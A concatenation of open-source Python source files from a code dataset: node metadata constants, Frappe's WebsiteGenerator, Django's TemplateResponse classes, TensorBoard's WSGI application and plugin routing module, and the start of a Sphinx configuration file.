:var STRUCT_CONSTRAINT: To specify struct constraint key
:var ENABLED_OPTIONS: To enable options
:var DISABLED_OPTIONS: To disable options
:var INPUT_WIDGET_VARIANT: To specify widget variant string
:var DESCRIPTION: To specify description for pin, which will be used as tooltip
:var VALUE_LIST: Specific for string pin. If specified, combo box will be created
:var VALUE_RANGE: Specific for ints and floats. If specified, slider will be created instead of value box
:var DRAGGER_STEPS: To specify custom value dragger steps
"""
SUPPORTED_DATA_TYPES = "supportedDataTypes"
CONSTRAINT = "constraint"
STRUCT_CONSTRAINT = "structConstraint"
ENABLED_OPTIONS = "enabledOptions"
DISABLED_OPTIONS = "disabledOptions"
INPUT_WIDGET_VARIANT = "inputWidgetVariant"
DESCRIPTION = "Description"
VALUE_LIST = "ValueList"
VALUE_RANGE = "ValueRange"
DRAGGER_STEPS = "DraggerSteps"
class NodeMeta:
"""Node meta constants
:var CATEGORY: To specify category for node. Will be considered by node box
:var KEYWORDS: To specify list of additional keywords, used in node box search field
:var CACHE_ENABLED: To specify if node is cached or not
"""
CATEGORY = "Category"
KEYWORDS = "Keywords"
CACHE_ENABLED = "CacheEnabled"
|
the-stack_0_1628 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.website.utils import cleanup_page_name
from frappe.website.render import clear_cache
from frappe.modules import get_module_name
class WebsiteGenerator(Document):
website = frappe._dict()
def __init__(self, *args, **kwargs):
self.route = None
super(WebsiteGenerator, self).__init__(*args, **kwargs)
def get_website_properties(self, key=None, default=None):
out = getattr(self, '_website', None) or getattr(self, 'website', None) or {}
if not isinstance(out, dict):
# website may be a property too, so ignore
out = {}
if key:
return out.get(key, default)
else:
return out
def autoname(self):
if not self.name and self.meta.autoname != "hash":
self.name = self.scrubbed_title()
def onload(self):
self.get("__onload").update({
"is_website_generator": True,
"published": self.is_website_published()
})
def validate(self):
self.set_route()
def set_route(self):
if self.is_website_published() and not self.route:
self.route = self.make_route()
if self.route:
self.route = self.route.strip('/.')[:139]
def make_route(self):
'''Returns the default route. If `route` is specified in DocType it will be
route/title'''
from_title = self.scrubbed_title()
if self.meta.route:
return self.meta.route + '/' + from_title
else:
return from_title
def scrubbed_title(self):
return self.scrub(self.get(self.get_title_field()))
def get_title_field(self):
'''return title field from website properties or meta.title_field'''
title_field = self.get_website_properties('page_title_field')
if not title_field:
if self.meta.title_field:
title_field = self.meta.title_field
elif self.meta.has_field('title'):
title_field = 'title'
else:
title_field = 'name'
return title_field
def clear_cache(self):
super(WebsiteGenerator, self).clear_cache()
clear_cache(self.route)
def scrub(self, text):
return cleanup_page_name(text).replace('_', '-')
def get_parents(self, context):
'''Return breadcrumbs'''
pass
def on_update(self):
self.send_indexing_request()
def on_trash(self):
self.clear_cache()
self.send_indexing_request('URL_DELETED')
def is_website_published(self):
"""Return true if published in website"""
if self.get_condition_field():
return self.get(self.get_condition_field()) and True or False
else:
return True
def get_condition_field(self):
condition_field = self.get_website_properties('condition_field')
if not condition_field:
if self.meta.is_published_field:
condition_field = self.meta.is_published_field
return condition_field
def get_page_info(self):
route = frappe._dict()
route.update({
"doc": self,
"page_or_generator": "Generator",
"ref_doctype":self.doctype,
"idx": self.idx,
"docname": self.name,
"controller": get_module_name(self.doctype, self.meta.module),
})
route.update(self.get_website_properties())
if not route.page_title:
route.page_title = self.get(self.get_title_field())
return route
def send_indexing_request(self, operation_type='URL_UPDATED'):
"""Send indexing request on update/trash operation."""
if frappe.db.get_single_value('Website Settings', 'enable_google_indexing') \
and self.is_website_published() and self.meta.allow_guest_to_view:
url = frappe.utils.get_url(self.route)
frappe.enqueue('frappe.website.doctype.website_settings.google_indexing.publish_site', \
url=url, operation_type=operation_type) |
the-stack_0_1632 | # from profilehooks import profile
from django.http import HttpResponse
from .loader import get_template, select_template
class ContentNotRenderedError(Exception):
pass
class SimpleTemplateResponse(HttpResponse):
rendering_attrs = ['template_name', 'context_data', '_post_render_callbacks']
def __init__(self, template, context=None, content_type=None, status=None,
charset=None, using=None):
# It would seem obvious to call these next two members 'template' and
# 'context', but those names are reserved as part of the test Client
# API. To avoid the name collision, we use different names.
self.template_name = template
self.context_data = context
self.using = using
self._post_render_callbacks = []
# _request stores the current request object in subclasses that know
# about requests, like TemplateResponse. It's defined in the base class
# to minimize code duplication.
# It's called self._request because self.request gets overwritten by
# django.test.client.Client. Unlike template_name and context_data,
# _request should not be considered part of the public API.
self._request = None
# content argument doesn't make sense here because it will be replaced
# with rendered template so we always pass empty string in order to
# prevent errors and provide shorter signature.
super().__init__('', content_type, status, charset=charset)
# _is_rendered tracks whether the template and context has been baked
# into a final response.
# Super __init__ doesn't know any better than to set self.content to
# the empty string we just gave it, which wrongly sets _is_rendered
# True, so we initialize it to False after the call to super __init__.
self._is_rendered = False
def __getstate__(self):
"""
Raise an exception if trying to pickle an unrendered response. Pickle
only rendered data, not the data used to construct the response.
"""
obj_dict = self.__dict__.copy()
if not self._is_rendered:
raise ContentNotRenderedError('The response content must be '
'rendered before it can be pickled.')
for attr in self.rendering_attrs:
if attr in obj_dict:
del obj_dict[attr]
return obj_dict
def resolve_template(self, template):
"""Accept a template object, path-to-template, or list of paths."""
if isinstance(template, (list, tuple)):
return select_template(template, using=self.using)
elif isinstance(template, str):
return get_template(template, using=self.using)
else:
return template
def resolve_context(self, context):
return context
@property
def rendered_content(self):
"""Return the freshly rendered content for the template and context
described by the TemplateResponse.
This *does not* set the final content of the response. To set the
response content, you must either call render(), or set the
content explicitly using the value of this property.
"""
template = self.resolve_template(self.template_name)
context = self.resolve_context(self.context_data)
return template.render(context, self._request)
def add_post_render_callback(self, callback):
"""Add a new post-rendering callback.
If the response has already been rendered,
invoke the callback immediately.
"""
if self._is_rendered:
callback(self)
else:
self._post_render_callbacks.append(callback)
# @profile(immediate=True, sort=['tottime'], dirs=True)
def render(self):
"""Render (thereby finalizing) the content of the response.
If the content has already been rendered, this is a no-op.
Return the baked response instance.
"""
retval = self
if not self._is_rendered:
self.content = self.rendered_content
for post_callback in self._post_render_callbacks:
newretval = post_callback(retval)
if newretval is not None:
retval = newretval
return retval
@property
def is_rendered(self):
return self._is_rendered
def __iter__(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be iterated over.'
)
return super().__iter__()
@property
def content(self):
if not self._is_rendered:
raise ContentNotRenderedError(
'The response content must be rendered before it can be accessed.'
)
return super().content
@content.setter
def content(self, value):
"""Set the content for the response."""
HttpResponse.content.fset(self, value)
self._is_rendered = True
class TemplateResponse(SimpleTemplateResponse):
rendering_attrs = SimpleTemplateResponse.rendering_attrs + ['_request']
def __init__(self, request, template, context=None, content_type=None,
status=None, charset=None, using=None):
super().__init__(template, context, content_type, status, charset, using)
self._request = request
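# Usage sketch (an addition, assuming Django settings and a template backend
# are configured, and `request` is an HttpRequest):
#
#   response = TemplateResponse(request, 'index.html', {'title': 'Home'})
#   response.add_post_render_callback(lambda r: print(len(r.content)))
#   response.render()        # bakes rendered_content into response.content
#   body = response.content  # before render() this raises ContentNotRenderedError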
|
the-stack_0_1633 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import sqlite3
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import parse as urlparse # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend.event_processing import db_import_multiplexer
from tensorboard.backend.event_processing import data_provider as event_data_provider # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_accumulator as event_accumulator # pylint: disable=line-too-long
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = '/data'
PLUGIN_PREFIX = '/plugin'
PLUGINS_LISTING_ROUTE = '/plugins_listing'
PLUGIN_ENTRY_ROUTE = '/plugin_entry.html'
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r'^[A-Za-z0-9_.-]+$')
logger = tb_logging.get_logger()
def tensor_size_guidance_from_flags(flags):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
if not flags or not flags.samples_per_plugin:
return tensor_size_guidance
for token in flags.samples_per_plugin.split(','):
k, v = token.strip().split('=')
tensor_size_guidance[k] = int(v)
return tensor_size_guidance
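# For example (added note), --samples_per_plugin "scalars=500,images=0" yields
# {..., 'scalars': 500, 'images': 0} layered over DEFAULT_TENSOR_SIZE_GUIDANCE.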
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
if flags.db_import:
# DB import mode.
db_uri = flags.db
# Create a temporary DB file if we weren't given one.
if not db_uri:
tmpdir = tempfile.mkdtemp(prefix='tbimport')
atexit.register(shutil.rmtree, tmpdir)
db_uri = 'sqlite:%s/tmp.sqlite' % tmpdir
db_connection_provider = create_sqlite_connection_provider(db_uri)
logger.info('Importing logdir into DB at %s', db_uri)
multiplexer = db_import_multiplexer.DbImportMultiplexer(
db_uri=db_uri,
db_connection_provider=db_connection_provider,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads)
elif flags.db:
# DB read-only mode, never load event logs.
reload_interval = -1
db_connection_provider = create_sqlite_connection_provider(flags.db)
multiplexer = _DbModeMultiplexer(flags.db, db_connection_provider)
else:
# Regular logdir loading mode.
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance_from_flags(flags),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags))
if flags.generic_data != 'false':
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugin loader instances.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
:type plugins: list[base_plugin.TBLoader]
"""
db_uri = None
db_connection_provider = None
if isinstance(
deprecated_multiplexer,
(db_import_multiplexer.DbImportMultiplexer, _DbModeMultiplexer)):
db_uri = deprecated_multiplexer.db_uri
db_connection_provider = deprecated_multiplexer.db_connection_provider
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
db_connection_provider=db_connection_provider,
db_uri=db_uri,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
window_title=flags.window_title)
tbplugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
plugin = loader.load(context)
if plugin is None:
continue
tbplugins.append(plugin)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(tbplugins, flags.path_prefix)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(self, plugins, path_prefix=''):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
flags: An argparse.Namespace containing TensorBoard CLI flags.
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
names must only contain [A-Za-z0-9_.-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
if self._path_prefix.endswith('/'):
# Should have been fixed by `fix_flags`.
raise ValueError('Trailing slash in path prefix: %r' % self._path_prefix)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError('Plugin %s has invalid name %r' % (plugin,
plugin.plugin_name))
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
raise
logger.warn('Plugin %s failed. Exception: %s',
plugin.plugin_name, str(e))
continue
for route, app in plugin_apps.items():
if not route.startswith('/'):
raise ValueError('Plugin named %r handles invalid route %r: '
'route does not start with a slash' %
(plugin.plugin_name, route))
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
)
if path.endswith('/*'):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if '*' in path:
# note we re-add the removed * in the format string
raise ValueError('Plugin %r handles invalid route \'%s*\': Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
unordered_prefix_routes[path] = app
else:
if '*' in path:
raise ValueError('Plugin %r handles invalid route %r: Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True))
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get('name')
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
      # Technically this is not possible, as plugin names are unique and are
      # checked in __init__.
reason = (
'Plugin invariant error: multiple plugins with name '
'{name} found: {list}'
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, 'Plugin is not module loadable', 'text/plain', code=400)
    # A non-self origin is blocked by CSP, but this is a good invariant check.
if urlparse.urlparse(module_path).netloc:
raise ValueError('Expected es_module_path to be non-absolute path')
module_json = json.dumps('.' + module_path)
script_content = 'import({}).then((m) => void m.render());'.format(
module_json)
digest = hashlib.sha256(script_content.encode('utf-8')).digest()
script_sha = base64.b64encode(digest).decode('ascii')
html = textwrap.dedent("""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
""").format(name=name, script_content=script_content)
return http_util.Respond(
request,
html,
'text/html',
csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
for plugin in self._plugins:
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
'Plugin listing: is_active() for %s took %0.3f seconds',
plugin.plugin_name, elapsed)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
'disable_reload': plugin_metadata.disable_reload,
'enabled': is_active,
# loading_mechanism set below
'remove_dom': plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata['tab_name'] = plugin_metadata.tab_name
else:
output_metadata['tab_name'] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
if element_name is not None and es_module_handler is not None:
logger.error(
'Plugin %r declared as both legacy and iframed; skipping',
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
'type': 'CUSTOM_ELEMENT',
'element_name': element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
'type': 'IFRAME',
'module_path': ''.join([
request.script_root, DATA_PREFIX, PLUGIN_PREFIX, '/',
plugin.plugin_name, es_module_handler,
]),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
'type': 'NONE',
}
output_metadata['loading_mechanism'] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, 'application/json')
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](environ, start_response)
logger.warn('path %s not found, sending 404', clean_path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)(
environ, start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
    logdir_spec: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
  # Keep this consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir_spec.split(','):
    # Check if the spec contains a group. A spec that starts with xyz:// is
    # regarded as a URI path spec instead of a group spec. If the spec looks
    # like /foo:bar/baz, then we assume it's a path with a colon. If the spec
    # looks like [a-zA-Z]:\foo then we assume it's a Windows path and not a
    # single-letter group.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/' and not os.path.splitdrive(specification)[0]):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
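# Illustrative parses (the paths are made up), following the rules documented above:
#
#   parse_event_files_spec('run1:/tmp/a,/tmp/b')
#   # -> {'/tmp/a': 'run1', '/tmp/b': None}   (local paths go through expanduser/realpath)
#   parse_event_files_spec('gs://bucket/logs')
#   # -> {'gs://bucket/logs': None}           (URI specs are kept verbatim)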
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval,
reload_task):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError('load_interval is negative: %d' % load_interval)
def _reload():
while True:
start = time.time()
logger.info('TensorBoard reload process beginning')
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logger.info('TensorBoard done reloading. Load took %0.3f secs', duration)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == 'process':
logger.info('Launching reload in a child process')
import multiprocessing
process = multiprocessing.Process(target=_reload, name='Reloader')
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ('thread', 'auto'):
logger.info('Launching reload in a daemon thread')
thread = threading.Thread(target=_reload, name='Reloader')
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == 'blocking':
if load_interval != 0:
raise ValueError('blocking reload only allowed with load_interval=0')
_reload()
else:
raise ValueError('unrecognized reload_task: %s' % reload_task)
def create_sqlite_connection_provider(db_uri):
"""Returns function that returns SQLite Connection objects.
Args:
db_uri: A string URI expressing the DB file, e.g. "sqlite:~/tb.db".
Returns:
A function that returns a new PEP-249 DB Connection, which must be closed,
each time it is called.
Raises:
ValueError: If db_uri is not a valid sqlite file URI.
"""
uri = urlparse.urlparse(db_uri)
if uri.scheme != 'sqlite':
raise ValueError('Only sqlite DB URIs are supported: ' + db_uri)
if uri.netloc:
raise ValueError('Can not connect to SQLite over network: ' + db_uri)
if uri.path == ':memory:':
raise ValueError('Memory mode SQLite not supported: ' + db_uri)
path = os.path.expanduser(uri.path)
params = _get_connect_params(uri.query)
# TODO(@jart): Add thread-local pooling.
return lambda: sqlite3.connect(path, **params)
def _get_connect_params(query):
params = urlparse.parse_qs(query)
if any(len(v) > 2 for v in params.values()):
raise ValueError('DB URI params list has duplicate keys: ' + query)
return {k: json.loads(v[0]) for k, v in params.items()}
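# A small sketch of the URI handling above (the file path is made up):
#
#   provider = create_sqlite_connection_provider('sqlite:~/tb.db?timeout=30')
#   conn = provider()  # equivalent to sqlite3.connect(os.path.expanduser('~/tb.db'), timeout=30)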
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != '/' and path.endswith('/'):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
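# Sketch of how the returned predicate is intended to be used by the loader
# (the variable names here are illustrative only):
#
#   is_active = _get_event_file_active_filter(flags)
#   if is_active is not None and not is_active(event_file_load_timestamp):
#       # skip reloading this inactive event file
#       pass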
class _DbModeMultiplexer(event_multiplexer.EventMultiplexer):
"""Shim EventMultiplexer to use when in read-only DB mode.
In read-only DB mode, the EventMultiplexer is nonfunctional - there is no
logdir to reload, and the data is all exposed via SQL. This class represents
the do-nothing EventMultiplexer for that purpose, which serves only as a
conduit for DB-related parameters.
The load APIs raise exceptions if called, and the read APIs always
return empty results.
"""
def __init__(self, db_uri, db_connection_provider):
"""Constructor for `_DbModeMultiplexer`.
Args:
db_uri: A URI to the database file in use.
db_connection_provider: Provider function for creating a DB connection.
"""
logger.info('_DbModeMultiplexer initializing for %s', db_uri)
super(_DbModeMultiplexer, self).__init__()
self.db_uri = db_uri
self.db_connection_provider = db_connection_provider
logger.info('_DbModeMultiplexer done initializing')
def AddRun(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def AddRunsFromDirectory(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def Reload(self):
"""Unsupported."""
raise NotImplementedError()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
:type plugin_spec:
Type[base_plugin.TBPlugin] | Type[base_plugin.TBLoader] |
base_plugin.TBLoader
:rtype: base_plugin.TBLoader
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
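# Illustration of the three accepted forms (CorePlugin is imported above; the
# TBLoader names below are placeholders, not real classes):
#
#   make_plugin_loader(core_plugin.CorePlugin)   # TBPlugin subclass -> BasicLoader(CorePlugin)
#   make_plugin_loader(SomeLoaderClass)          # TBLoader subclass -> SomeLoaderClass()
#   make_plugin_loader(SomeLoaderClass())        # TBLoader instance -> returned unchanged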
|
the-stack_0_1634 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Documentation build configuration file, created by
# sphinx-quickstart on Sat Jan 21 19:11:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# So autodoc can import our package
sys.path.insert(0, os.path.abspath("../.."))
# Warn about all references to unknown targets
nitpicky = True
# Except for these ones, which we expect to point to unknown targets:
nitpick_ignore = [
# Format is ("sphinx reference type", "string"), e.g.:
("py:obj", "bytes-like")
]
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
